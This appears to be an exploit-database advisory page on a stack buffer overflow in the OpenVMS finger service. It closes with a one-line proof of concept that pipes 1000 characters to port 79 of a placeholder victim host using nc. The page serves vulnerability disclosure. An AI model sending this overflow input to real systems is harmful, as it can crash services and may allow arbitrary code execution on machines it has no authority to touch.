header-logo
Suggest Exploit
vendor:
OpenVMS
by:
SecurityFocus
7.5
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: OpenVMS
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: Unknown
Related CWE: N/A
CPE: o:hp:openvms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2008

OpenVMS Finger Service Buffer Overflow Vulnerability

The finger service ('fingerd') on OpenVMS is prone to a stack-based buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied input. Attackers can exploit this issue to execute arbitrary code in the context of the affected application. Failed attempts will likely cause denial-of-service conditions.

Mitigation:

It is recommended to update to the latest version of OpenVMS.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/30589/info

The finger service ('fingerd') on OpenVMS is prone to a stack-based buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied input.

Attackers can exploit this issue to execute arbitrary code in the context of the affected application. Failed attempts will likely cause denial-of-service conditions.

We were not told which versions are affected. We will update this BID as more information emerges.

echo `perl -e 'print "a"x1000'` | nc -v victim.example.com 79